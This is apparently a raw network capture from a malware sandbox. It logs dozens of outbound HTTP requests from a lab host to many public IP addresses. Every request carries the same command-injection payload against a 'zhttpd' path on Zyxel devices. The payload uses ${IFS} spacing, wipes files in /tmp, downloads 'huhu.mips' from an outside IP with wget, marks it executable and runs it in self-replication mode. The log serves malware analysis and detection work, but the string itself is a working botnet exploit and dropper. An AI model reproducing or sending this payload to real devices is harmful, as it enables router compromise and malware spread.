                                                        Feb 2, 2024 06:21:21.158479929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7147192.168.2.1454004180.109.207.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158509970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7148192.168.2.145867263.63.94.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158535004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7149192.168.2.143979046.18.167.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158586979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7150192.168.2.1459284193.250.165.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158642054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7151192.168.2.1447012146.253.25.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158674002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7152192.168.2.145242061.145.228.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158720016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7153192.168.2.1449060191.35.177.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158749104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7154192.168.2.1451448205.13.99.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158849955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7155192.168.2.1449650123.150.136.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158880949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7156192.168.2.1435400131.195.140.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158936977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7157192.168.2.1448634213.133.57.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158979893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7158192.168.2.145858270.110.148.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159027100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7159192.168.2.1445828202.5.224.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159060001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7160192.168.2.1439302163.252.82.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159112930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7161192.168.2.1443146210.24.155.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159132004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7162192.168.2.1455272147.249.215.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159166098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7163192.168.2.145035677.244.138.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159228086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7164192.168.2.1441338202.111.10.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159261942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7165192.168.2.144323696.248.137.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159284115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7166192.168.2.144089877.11.142.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159312010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7167192.168.2.1453996165.123.37.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159357071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7168192.168.2.1433092152.118.75.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159406900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7169192.168.2.1441068196.28.57.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159444094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7170192.168.2.1455094101.8.14.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159490108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7171192.168.2.1460508165.209.143.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159531116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7172192.168.2.143409677.93.152.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159574032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7173192.168.2.144809491.161.67.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159604073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7174192.168.2.144928862.27.66.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159630060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7175192.168.2.145751095.123.167.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159679890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7176192.168.2.145695268.78.127.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159723997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7177192.168.2.144207682.71.79.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159759045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7178192.168.2.143524875.117.216.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159792900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7179192.168.2.144031035.149.84.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159828901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7180192.168.2.1457388147.148.137.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159862995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7181192.168.2.1438706144.198.36.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159908056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7182192.168.2.1442062155.84.121.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159930944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7183192.168.2.143507291.189.153.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.159986973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7184192.168.2.144180657.215.129.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160013914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7185192.168.2.1434484210.13.31.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160048962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7186192.168.2.1447290217.170.11.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160082102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7187192.168.2.1436768156.127.58.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160129070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7188192.168.2.144140076.56.195.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160156012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7189192.168.2.143538261.30.24.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160181999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7190192.168.2.146093620.168.95.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160223961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7191192.168.2.143981098.214.175.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160254002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192192.168.2.1450680186.191.49.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160294056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7193192.168.2.1436226161.34.60.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160334110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7194192.168.2.143996695.191.235.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160381079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7195192.168.2.1448334166.136.189.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160422087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7196192.168.2.145647688.3.247.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160478115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7197192.168.2.1452452111.248.105.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160500050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7198192.168.2.143979618.181.121.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160537004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7199192.168.2.1456832151.89.5.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160610914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7200192.168.2.143443646.179.15.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160634995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7201192.168.2.1457720183.88.79.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160680056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7202192.168.2.1453956201.207.76.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160726070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7203192.168.2.1441844139.247.200.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160759926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7204192.168.2.143921280.40.125.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160792112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7205192.168.2.145765645.198.222.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160851002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7206192.168.2.1439232220.188.125.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160886049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7207192.168.2.144094658.55.27.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160909891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7208192.168.2.1459924137.150.230.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.160964966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7209192.168.2.1444786178.0.232.198443
                                                        TimestampBytes transferredDirectionData
